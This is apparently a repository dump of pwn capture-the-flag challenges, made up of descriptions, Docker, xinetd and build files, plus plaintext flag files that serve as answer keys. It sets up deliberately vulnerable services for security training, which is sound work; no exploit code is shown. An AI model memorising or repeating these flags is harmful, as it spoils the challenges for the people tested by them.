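4 | #define DIGEST_PAYLOAD_SIZE_MAX 0x2000 5 | #define DIGEST_SIZE 0x20 6 | #define SIGNATURE_SIZE 0x100 7 | 8 | #define FLAG_SIZE_MAX 0x100 9 | #define APPLETSPACE_FLAG_FNAME "/home/Astral/astralNebula" 10 | #define PROCESSORSPACE_FLAG_FNAME "/home/Astral/astralProtostar" 11 | #define USERSPACE_FLAG_FNAME
"/home/Astral/astralRedgiant" 12 | #define KERNELSPACE_FLAG_FNAME "/home/Astral/astralSupernova" 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/interrupt.h: -------------------------------------------------------------------------------- 1 | #ifndef __INTERRUPT_HEADER__ 2 | #define __INTERRUPT_HEADER__ 3 | 4 | #include 5 | #include "hypervisor.h" 6 | #include "device.h" 7 | #include "hypercall.h" 8 | 9 | #define APPLET_INVOKE_INTERRUPT 0x01 10 | #define APPLET_RES_INTERRUPT 0x02 11 | 12 | void injectInterrupt(VM *vm, uint64_t interruptEntry, uint64_t kernelInterruptStackAddr); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/util.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | /* Print msg with puts() and terminate the process via _exit(0); never returns. NOTE(review): the exit status is 0 even on this error path, and _exit() does not flush stdio buffers, so the message can be lost if stdout is buffered; confirm buffering is disabled elsewhere. */ void __attribute__((noreturn)) printError(char *msg) { 4 | puts(msg); 5 | _exit(0); 6 | } 7 | 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/util.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTIL_HEADER__ 2 | #define __UTIL_HEADER__ /* must match the #ifndef above for the include guard to take effect */ 3 | 4 | #include 5 | #include 6 | 7 | void __attribute__((noreturn)) printError(char *msg); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gcc -masm=intel -nostdlib -fno-builtin entry.S panic.S syscall.S interruptEntry.S elf.c hypercall.c kernel.c memory.c syscall.c applet.c -o kernel 4 | --------------------------------------------------------------------------------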
/MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/const.h: -------------------------------------------------------------------------------- 1 | #ifndef __CONST_HEADER__ 2 | #define __CONST_HEADER__ 3 | 4 | #define SUCCESS 0 5 | #define FAIL 0xffffffffffffffff 6 | 7 | #define DIGEST_PAYLOAD_SIZE_MAX 0x2000 8 | #define DIGEST_SIZE 0x20 9 | #define SIGNATURE_SIZE 0x100 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/entry.S: -------------------------------------------------------------------------------- 1 | .globl _start, hlt 2 | .extern kernelMain 3 | .intel_syntax noprefix 4 | _start: 5 | call kernelMain 6 | hlt: 7 | hlt 8 | jmp hlt 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/interruptEntry.S: -------------------------------------------------------------------------------- 1 | .globl _interruptStart 2 | .extern kAppletInterrupt, hlt 3 | .intel_syntax noprefix 4 | _interruptStart: 5 | call kAppletInterrupt 6 | hlt 7 | jmp hlt 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/panic.S: -------------------------------------------------------------------------------- 1 | .globl panic 2 | .extern hlt 3 | .intel_syntax noprefix 4 | panic: 5 | mov eax, edi 6 | mov dx, 0x8002 7 | out dx, eax 8 | jmp hlt 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/panic.h: -------------------------------------------------------------------------------- 1 | #ifndef __PANIC_HEADER__ 2 | #define __PANIC_HEADER__ 3 | 4 | void __attribute__((noreturn)) panic(uint8_t *s); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- 
/MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/USER/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gcc -masm=intel -nostdlib -fno-builtin entry.S user.c lib.c syscall.c -o user 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/USER/entry.S: -------------------------------------------------------------------------------- 1 | .globl _start, hlt 2 | .extern userMain 3 | .intel_syntax noprefix 4 | _start: 5 | call userMain 6 | hlt: 7 | hlt 8 | jmp hlt 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Babyheap 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Heap is easy isn't it? 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m babyheap 7 | RUN chown -R root:root /home/babyheap 8 | RUN chmod -R 755 /home/babyheap 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | babyheap: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/babyheap:ro 8 | - ./xinetd:/etc/xinetd.d/babyheap:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/share/babyheap: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Babyheap/distribute/share/babyheap -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{EDU_h3ap_1S_e45y_c0nf1rm3d} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/babyheap/babyheap 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service babyheap 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyheap/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyheap 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all babyheap.c -o babyheap 4 | strip babyheap 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm babyheap 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Babynote 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Baby notes for sale 9 | 10 | Estimated Difficulty : 11 | 2/10 12 |
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m Babynote 7 | RUN chown -R root:root /home/Babynote 8 | RUN chmod -R 755 /home/Babynote 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | babynote: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Babynote:ro 8 | - ./xinetd:/etc/xinetd.d/babynote:ro 9 | ports: 10 | - "30203:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/share/babynote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Babynote/distribute/share/babynote -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{4pp4rently_bab1es_can_wr1t3_n0t3s} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Babynote/babynote 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/xinetd: 
-------------------------------------------------------------------------------- 1 | service babynote 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Babynote/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Babynote 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all babynote.c -o babynote 3 | strip babynote 4 | 5 | clean: 6 | rm babynote 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Bookstore 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | I've been fascinated by the Earthsea Quartet since I was a child, so I opened a bookstore to share Ursula Le Guin's books with y'all. Care to have a look around?
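9 | 10 | Estimated Difficulty : 11 | 2/10 12 |
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/Dockerfile: --------------------------------------------------------------------------------
# Bookstore challenge image: socat serves the binary on TCP 4444 as the
# unprivileged "bookstore" user.
FROM ubuntu:19.04

# Ubuntu 19.04 (disco) is end-of-life and its packages are only served from
# old-releases.ubuntu.com. Repoint apt the same way the disco-based Dockerfiles
# elsewhere in this repository do; without this `apt-get update` fails.
# NOTE(review): an EOL base image gets no security updates, which is acceptable
# only on an isolated, disposable challenge host.
RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list
RUN apt-get update
RUN apt-get dist-upgrade -y
RUN apt-get install socat -y

# Overwrite the image's libc and loader with the bundled 2.29 copies
# (presumably so the remote matches the files handed to players - confirm).
COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so
COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2

RUN useradd -m bookstore
COPY bookstore flag /home/bookstore/
# root owns the files and group "bookstore" gets read/execute only, so the
# service user can run the binary and read the flag but cannot modify either.
RUN chown -R root:bookstore /home/bookstore
RUN chmod -R 750 /home/bookstore/
EXPOSE 4444
USER bookstore
# -T30 closes a connection after 30 s of inactivity; fork handles each
# connection in its own child process.
CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/bookstore/bookstore
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/bookstore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Bookstore/bookstore -------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/flag: -------------------------------------------------------------------------------- 1 | FLAG{Ged_and_Sparrowhawk_and_The_Earthsea_Quartet} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Childnote 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Babies grow up 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN 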
useradd -m Childnote 7 | RUN chown -R root:root /home/Childnote 8 | RUN chmod -R 755 /home/Childnote 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | childnote: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Childnote:ro 8 | - ./xinetd:/etc/xinetd.d/childnote:ro 9 | ports: 10 | - "30204:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/share/childnote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Childnote/distribute/share/childnote -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{b4by_but_b1gg3r_1n_5iz3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Childnote/childnote 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service childnote 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Childnote/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Childnote 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all childnote.c -o childnote 3 | strip childnote 4 | 5 | clean: 6 | rm childnote 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Cobolstrike 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Cobol strikes back 9 | 10 | NOTE: Modified from PlaidCTF 2021 "The Cobol Job" (https://ctftime.org/task/15642). The solution is completely different, so don't worry if you haven't looked at the original challenge. Feel free to diff the source code if you find it helpful. 11 | 12 | Estimated Difficulty : 13 | 4/10 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04@sha256:f2034e7195f61334e6caff6ecf2e965f92d11e888309065da85ff50c617732b8 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update && apt-get install xinetd open-cobol -qy 7 | RUN useradd -m Cobolstrike 8 | 9 | CMD ["/usr/sbin/xinetd","-dontfork"] 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cobolstrike: 5 | build: . 
6 | volumes: 7 | - ./share:/home/Cobolstrike:ro 8 | - ./xinetd:/etc/xinetd.d/cobolstrike:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | restart: always 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/archive/NOTE: -------------------------------------------------------------------------------- 1 | hello, brave adventurer 2 | thank you for visiting 3 | here's a quest for you 4 | please defeat the evil cobol and recover the stolen flag 5 | i'll be waiting for you at the adventurer's guild 6 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/cobolstrike: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Cobolstrike/distribute/share/cobolstrike -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{H3re_l13s_7he_m1ghty_Cob0l_sla1n_by_fd_0verfl0w} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/Cobolstrike/archive 6 | timeout 150 /home/Cobolstrike/cobolstrike 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service cobolstrike 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Cobolstrike/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Cobolstrike 10 | groups 
= yes 11 | bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cobc -x /root/cobolstrike.cbl -o /root/cobolstrike 3 | clean: 4 | rm cobolstrike 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Diary 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Diaries -- fun to read, painful to keep 9 | 10 | Estimated Difficulty : 11 | 7/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/Diary_writeup.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Diary/Diary_writeup.key -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m Diary 8 | RUN chown -R root:root /home/Diary 9 | RUN chmod -R 755 /home/Diary 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | diary: 5 | build: . 
6 | volumes: 7 | - ./share:/home/Diary:ro 8 | - ./xinetd:/etc/xinetd.d/diary:ro 9 | ports: 10 | - "10102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/share/diary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Diary/distribute/share/diary -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{th3r3_c0m3s_4_t1m3_wh3n_wri73_1s_re4d_4nd_pu7s_is_g3t} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Diary/diary 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service diary 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Diary/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Diary 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all diary.c -o diary 3 | strip diary 4 | 5 | clean: 6 | rm diary 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/Desc: 
-------------------------------------------------------------------------------- 1 | Title : 2 | EDUshell 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | You have a shell, now what? 9 | 10 | Estimated Difficulty : 11 | 2/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m EDUshell 7 | RUN chown -R root:root /home/EDUshell 8 | RUN chmod -R 755 /home/EDUshell 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | edushell: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/EDUshell:ro 8 | - ./xinetd:/etc/xinetd.d/edushell:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/share/EDUshell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/EDUshell/distribute/share/EDUshell -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{5ee_thr0ugh_th3_b1ind3d_3y3s} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 
| timeout 60 /home/EDUshell/EDUshell 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service edushell 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/EDUshell/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = EDUshell 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 |
-------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/sourcecode/Makefile: --------------------------------------------------------------------------------
# Build the EDUshell challenge binary from EDUshell.c.
#
# NOTE(review): SECCOMP.h is downloaded at build time from the mutable `master`
# branch and compiled in with no integrity check, so the header (judging by its
# name, the seccomp helper code) is whatever that URL serves on the day of the
# build. Prefer vendoring the header, or fetching a fixed revision
# (.../CTF/<commit-sha>/utils/Pwn/SECCOMP.h) and verifying its checksum.
#
# Hardening flags: -Wl,-z,now binds all symbols at load time, -fpie emits
# position-independent code, -fstack-protector-all puts a stack canary in every
# function. `strip` then removes the symbol table from the shipped binary, and
# the downloaded header is deleted again after the build.
all:
	wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h
	gcc -Wl,-z,now -fpie -fstack-protector-all EDUshell.c -o EDUshell
	strip EDUshell
	rm SECCOMP.h

clean:
	rm EDUshell
-------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Elf Fortress 3 | 4 | Category : 5 | Sandbox, Pwn 6 | 7 | Desc : 8 | The elves weaved a spell to seal their fortress, and it seems that they're pretty good at their art 9 | 10 | Estimated Difficulty : 11 | 7/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/DISTNOTE: -------------------------------------------------------------------------------- 1 | kernel : linux-5.14.14 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update 7 | RUN apt-get install xinetd qemu-system-x86 -y 8 | RUN 
useradd -m ElfFortress 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | elffortress: 5 | build: . 6 | volumes: 7 | - ./share:/home/ElfFortress:ro 8 | - ./xinetd:/etc/xinetd.d/elffortress:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | restart: always 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/share/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ElfFortress/distribute/share/bzImage -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/share/initramfs.cpio: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ElfFortress/distribute/share/initramfs.cpio
-------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/share/run.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Per-connection launcher (the xinetd `server` for this challenge): boots the
# challenge kernel and initramfs in QEMU with the guest serial console attached
# to this connection's stdin/stdout.

# Discard stderr so QEMU diagnostics are not sent to the client.
exec 2>/dev/null

# -m 256 gives the guest 256 MB of RAM; the kvm64 CPU model is extended with
# SMEP and SMAP; `kaslr` is passed on the kernel command line.
# NOTE(review): unlike the `timeout 60 ...` wrappers in the other run.sh scripts
# in this repository, nothing bounds the session here, so every connection
# holds a QEMU guest until it exits or the client disconnects. Consider a
# `timeout` wrapper plus xinetd `instances` / `per_source` limits.
# NOTE(review): with -nographic QEMU multiplexes its monitor onto the same stdio
# as the serial console unless the monitor is redirected (e.g. `-monitor none`);
# confirm the monitor is not exposed to remote users.
qemu-system-x86_64 \
    -m 256 \
    -cpu kvm64,+smep,+smap \
    -kernel /home/ElfFortress/bzImage \
    -initrd /home/ElfFortress/initramfs.cpio \
    -nographic \
    -append "console=ttyS0 kaslr quiet"
-------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service elffortress 2 | { 3 | 
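disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ElfFortress/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ElfFortress 10 | port = 10101 11 | flags = reuse 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all sandbox.c -o sandbox 3 | strip sandbox 4 | 5 | clean: 6 | rm sandbox 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Formatfree 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | free of format 9 | 10 | Hint : 11 | printf is easy? think twice. 12 | 13 | Estimated Difficulty : 14 | 2/10 15 |
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/Dockerfile: --------------------------------------------------------------------------------
# Formatfree challenge image: xinetd on Ubuntu 19.04 (disco). docker-compose.yml
# bind-mounts ./share onto /home/Formatfree and the xinetd service file, both
# read-only.
FROM ubuntu:disco-20200114
MAINTAINER James

# disco is end-of-life, so apt is repointed at old-releases.ubuntu.com before
# anything is installed.
RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \
    apt-get update && \
    DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd
# The account name must match `user = Formatfree` in the xinetd service file and
# the /home/Formatfree paths below. With any other name `useradd -m` does not
# create /home/Formatfree, the chown/chmod steps have nothing to act on, and
# xinetd has no Formatfree user to run the service as.
RUN useradd -m Formatfree
# root-owned and not writable by the service user.
RUN chown -R root:root /home/Formatfree
RUN chmod -R 755 /home/Formatfree

# Keep xinetd in the foreground as the container's main process.
CMD ["/usr/sbin/xinetd","-dontfork"]
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | 2 | version: '3' 3 | 4 | services: 5 | formatfree: 6 | build: ./ 7 | volumes: 8 | - ./share:/home/Formatfree:ro 9 | - ./xinetd:/etc/xinetd.d/formatfree:ro 10 | ports: 11 | - "10102:10101" 12 | 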
expose: 13 | - "10101" 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{fr33_0f_f0rm4t_and_free_7o_fr33} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/share/formatfree: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Formatfree/distribute/share/formatfree -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Formatfree/formatfree 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service formatfree 2 | { 3 | disable = no 